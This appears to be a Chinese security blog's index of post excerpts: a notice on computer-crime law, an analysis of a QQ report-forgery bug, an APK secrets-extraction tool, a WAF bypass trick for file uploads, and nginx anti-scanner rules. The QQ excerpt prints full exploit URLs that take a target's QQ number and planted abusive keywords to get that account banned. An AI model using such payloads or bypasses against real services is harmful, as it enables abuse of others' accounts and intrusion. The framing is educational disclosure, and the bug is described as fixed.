    Kirin博客致力于打造专业的网络安全学习平台,将专业知识通俗易懂的讲解给用户,但是网站的很多优质创作内容被不少不法分子利用,鉴于此本平台进行了整改,一路上,感谢您的陪伴与支持。 提高法律意识 侵犯公民信息罪 根据《中国人民共和国刑法总成》(第15版)第二百五十三条之一规定 情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金  根据《最高人民法院 最高人民检察院关于办理侵犯公民个人信息刑事案件适用法律若干问题的解释》第五条 非法获取、出售或者提供公民个人信息,具有下列情形之一的,应当认定为刑法第二百五十三条之一规定的“情节严重” (一)出售或者提供行踪轨迹信息,被他人用于犯罪的; (二)知道或者应当知道他人利用公民个人信息实施犯罪,向其出售或者提供的; (三)非法获取、出售或者提供行踪轨迹信息、通信内容、征信信息、财产信息五十条以上的; (四)非法获取、出售或者提供住宿信息、通信记录、健康生理信息、交易信息等其他可能影响人身、财产安全的公民个人信息五百条以上的; (五)非法获取、出售或者提供第三项、第四项规定以外的公民个人信息五千条以上的; (六)数量未达到第三项至第五项规定标准,但是按相应比例合计达到有关数量标准的; (七)违法所得五千元以上的; (八)将在履行职责或者提供服务过程中获得的公民个人信息出售或者提供给他人,数量或者数额达到第三项至第七项规定标准一半以上的; (九)曾因侵犯公民个人信息受过刑事处罚或者二年内受过行政处罚,又非法获取、出售或者提供公民个人信息的; (十)其他情节严重的情形。 情节特别严重的,处三年以上七年以下有期徒刑,并处罚金  根据《最高人民法院 最高人民检察院关于办理侵犯公民个人信息刑事案件适用法律若干问题的解释》 第六条 为合法经营活动而非法购买、收受本解释第五条第一款第三项、第四项规定以外的公民个人信息,具有下列情形之一的,应当认定为刑法第二百五十三条之一规定的“情节严重”: (一)利用非法购买、收受的公民个人信息获利五万元以上的;(二)曾因侵犯公民个人信息受过刑事处罚或者二年内受过行政处罚,又非法购买、收受公民个人信息的;(三)其他情节严重的情形。实施前款规定的行为,将购买、收受的公民个人信息非法出售或者提供的,定罪量刑标准适用本解释第五条的规定。 参考资料: 《最高人民法院 最高人民检察院 关于办理侵犯公民个人信息刑事案件适用法律若干问题的解释》 《侵犯公民个人信息罪的理解与适用》 非法侵入计算机信息系统罪 根据 《中国人民共和国刑法总成》(第15版) 第二百八十五条规定 违反国家规定,侵入国家事务、国防建设、尖端技术科技领域的计算机信息系统的,处三年以下有期徒刑或者拘役 非法获取计算机信息系统数据、非法控制计算机信息系统罪 违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制 情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金 根据《 最高人民法院 最高人民检察院 关于办理危害计算机信息系统安全刑事案件应用法律若干问题的解释》第一条具有下列情形之一的,应当认定为刑法第二百五十八条第二款规定的“情节严重“: (一) 获取支付结算、证券交易、期货交易等网络金融服务的身份认证信息10组以上; (二)获取第(一)项以外的身份认证信息500组以上的; (三) 非法控制计算机信息系统20台以上的; (四)违法所得 5000元以上或者造成经济损失1万元以上的; (五)其他情节严重的情形 情节特别严重的,处三年以上七年以下有期徒刑,并处罚金  根据《 最高人民法院 最高人民检察院 关于办理危害计算机信息系统安全刑事案件应用法律若干问题的解释》第一条具有下列情形之一的,应当认定为刑法第二百五十八条第二款规定的“情节特别严重“: (一) 数量或者数额达到前款第(一)项至第(四)项规定标准5倍以上的; (二)其他情节特别严重的情形 提供侵入、非法控制计算机系统程序、工具罪 提供专门用于侵入、非法控制计算机信息系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具 情节严重的,依照前款规定处罚  根据《 最高人民法院 最高人民检察院 关于办理危害计算机信息系统安全刑事案件应用法律若干问题的解释》第三条具有下列情形之一的,应当认定为刑法第二百八十五条第三款规定的”情节严重“: (一) 提供能够用于非法获取支付结算、证券交易、期货交易等网络金融服务身份认证信息的专门性程序、工具5人次以上; (二) 提供第(一)项以外的专门用于侵入、非法控制计算机信息系统的程序、工具20人次以上; (三) 明知他人实施非法获取支付结算、证券交易、期货交易等网络金融服务身份认证信息的违法犯罪行为而为其提供程序、工具5人次以上的; (四) 明知他人实施第(三)项以外的侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具20人次以上的; (五) 违法所得5000元以上或者造成经济损失1万元以上的; (六) 其他情节严重的情形 情节特别严重的,依照前款规定处罚  根据《 最高人民法院 最高人民检察院 关于办理危害计算机信息系统安全刑事案件应用法律若干问题的解释》第三条具有下列情形之一的,应当认定为刑法第二百八十五条第三款规定的”情节特别严重“: (一) 数量或者数额达到前款第(一)项至第(五)项规定标准5倍以上的; (二) 其他情节特别严重的情形 单位犯前三款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照各该款的规定处罚 破坏计算机信息系统罪 违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行 后果严重的,处五年以下有期徒刑或者拘役;  根据《 最高人民法院 最高人民检察院 关于办理危害计算机信息系统安全刑事案件应用法律若干问题的解释》第四条具有下列情形之一的,应当认定为刑法第二百八十六条第一款规定的”情节严重“: (一) 造成10台以上计算机信息系统的主要软件或者硬件不能正常运行的; (二) 对20台以上计算机信息系统中存储、处理或者传输的数据进行删除、修改、增加操作的; (三) 违法所得5000元以上或者造成经济损失1万元以上的; (四) 造成为100台以上计算机信息系统提供域名解析、身份认证、计费等基础服务或者为1万以上用户提供服务的计算机信息系统不能正常运行累计1小时以上的; (五) 造成其他严重后果的 后果特别严重的,处五年以上有期徒刑;  根据《 最高人民法院 最高人民检察院 关于办理危害计算机信息系统安全刑事案件应用法律若干问题的解释》第四条具有下列情形之一的,应当认定为破坏计算机信息系统”情节特别严重“: (一) 数量或者数额达到前款第(一)项或者第(三)项规定标准5倍以上的; (二) 造成为500台以上计算机信息系统提供域名解析、认证 违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。 故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后果严重的,依照第一款的规定处罚 单位犯前三款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照第一款的规定处罚 公安机关“净网2021”专项行动取得阶段性显著成效 参考https://mp.weixin.qq.com/s/sJzIqeN9A6x71gowxZh69A...

    2022-11-20 值得一看 58
  • QQ大规模封号事件分析

    最近两天QQ出现了大规模封号的情况,当然,我在推送群里的几个QQ也被封了,自己用的大号还健在。 结果就有热心网友找到了漏洞相关的POC,先对马叔叔(10001)进行了一波尝试,结果发现没有效果。 然后就拿我大号进行了测试,当时,我正好在吃饭,结果GG了……  0:00 / 00 漏洞产生的原因 客户端版本较多导致可能存在一些没有废弃的旧版接口 可以在URL中修改eviluin、text_evidence字段,就可以修改要举报的QQ号和证据 漏洞POC 目前看应该是已经和谐了,我们将其中的URL也分享出来供大家学习参考 漏洞URL样本一 您需要将QQ号替换为目标的QQ号 https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=QQ号&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A 我们分析下上面的一些字段,目标QQ号使用的是eviluin,举报证据字段如下 text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91; 通过URL解码,我们可以看到里面有一些关键词,正是命中了这些关键词导致的用户被立刻封号 漏洞URL样本二 QQ号需要修改为目标QQ号 https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=QQ号&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A 以上两个样本可以造成封号1、7天,其实就是利用了这些字段可以随意修改,而且大概率是从旧版电脑QQ上遗留的部分功能导致的。因此,做安全喜欢考古是一个很不错的思路,比方说从以前的老版本的应用上寻找一些可能还遗留的接口进行参数篡改,就会导致网上说的这种无违规(wwg)封号的情况 POC验证 在输入上面的URL,在手机客户端访问后,可以看到举报成功 当然我自己的号也不例外,被热心网友安排了一天的套餐 你可以去安全中心,输入对应的QQ检测封号情况 https://accounts.qq.com/login/limit 目前可以看到很多大佬的QQ都因为这个漏洞被临时封禁了 很多短位或者靓号也被热心网友给搞封了 这个漏洞目前应该是已经修复了,而且通过这个漏洞被封禁的账户现在也都解封了 ...

    2022-11-20 实用工具 138
  • app敏感信息工具

    目前提取了APK内: 所有字符串 所有URLs 所有ip 可能是hash值的字符串 存在的敏感词(如oss.aliyun) 可能是accessKey的值 使用Python开发,依赖于apkutils模块,可执行文件使用pyinstaller打包。 链接: https://pan.baidu.com/s/11kbWMdoFUX8qnsb3FvySBg 提取码: pr39 ...

    2022-11-20 实用工具 55
  • 任意文件上传的技巧

    bypass任意文件上传系列会总结最常见的绕过思路和方法 1.首先上传点,我们得判断他是不是黑白名单,是否存在waf(检测机制) 可以看到这里有个上传功能,上传简历和图片,这有可能是前端验证,我们先上传个jpg文件 然后抓包 这里的话我们就要判断是不是黑白名单还是任意文件上传,这个时候我们只要吧jpg后缀改成jpgx进行判断 如果是白名单想都不要想只能上传指定的后缀。 可以上传,这个时候我们试下脚本文件,比如jsp 我们可以看见上传jsp文件被拦截,仔细一看原来是防火墙拦截 到这里的话就得讲绕过思路了 常见绕waf呢我这里先讲一种,不然后面我就写(编)不下去了 双写filename绕过 原理呢,这个上传只判断Content-Disposition的filename的文件名 filename如果为多个这里waf就会判断最前面的那个是不是waf里面设置好了的黑名单(不代表所有waf) 比如这样 或这样(注意filename="2.jsp";filename="2.jspjsp" 的中间有个;) ...

    2022-11-19 技术教程 52
  • nginx禁止文件下载防止服务器被恶意扫描

    自从网站建立之初到现在网站有了规模后,每天都有无数个机器人来恶意扫描网站备份文件,日志多的让你觉的可怕,对于这种恶意扫描的方法就需要以彼之道,还施彼身,我们可以通过以下俩种方法来防止服务器被恶意扫描,其中以彼之道,还施彼身的方法,彧繎把它称为:防暴美学。 方法一 此种方法比较暴力,就是以彼之道,还施彼身,利用伪静态规则进行跳转下载,比如:扫描根目录下的 /web.rar,那么就会触发规则跳转到大文件下载地址,100G让他慢慢下载,下个爽,磁盘爆了才开心。 打开网站 Nginx 配置文件,将以下规则加入 server 内,完成配置,规则如下: server { ... # 专治扫描户 rewrite \.rar/?$ http://speedtest.tele2.net/100GB.zip permanent; rewrite \.tar/?$ http://speedtest.tele2.net/100GB.zip permanent; rewrite \.zip/?$ http://speedtest.tele2.net/100GB.zip permanent; rewrite \.sql/?$ http://speedtest.tele2.net/100GB.zip permanent; rewrite \.gz/?$ http://speedtest.tele2.net/100GB.zip permanent; rewrite \.7z/?$ http://speedtest.tele2.net/100GB.zip permanent; # 或者使用 rewrite \.(rar|zip|tar|sql|gz|7z)/?$ http://speedtest.tele2.net/100GB.zip permanent; ... } 如果你觉得 100GB 响应时间有点长,那么下面的小文件下载地址如下(资源来自互联网与本站无关): 新加坡: http://lg-sin.fdcservers.net/10GBtest.zip 日本: http://lg-tok.fdcservers.net/10GBtest.zip 香港: http://lg-hkg.fdcservers.net/10GBtest.zip 方法二 此方法最简单粗暴,直接网站 Nginx 配置文件里面添加以下的规则,针对服务器上经常让扫描的文件,进行直接禁止访问,请注意:资源下载网站请慎用,规则如下: server{ ... # 禁止访问指定文件 location ~ \.(zip|rar|sql|tar|gz|7z)$ { return 444; } ... } 以上 Nginx 规则就是当有用户或恶意扫描访问网站上的 zip|rar|sql|tar|gz|7z 等资源时,直接返回 444 错误码。 最后说明 以上方法各有千秋,但我更加喜欢第一种方法,以彼之道,还施彼身,像我的性格,既然来了,我也不好意思让人家空手而归是吧,而方法二之所以没有选择,是因为本站毕竟提供下载服务,如果直接全部禁止访问,那么用户就没办法下载了,所以资源下载网站请慎用方法二。 ...

    2022-11-02 实用工具 53

联系我们

在线咨询:点击这里给我发消息

QQ交流群:

工作日:8:00-23:00,节假日休息

扫码关注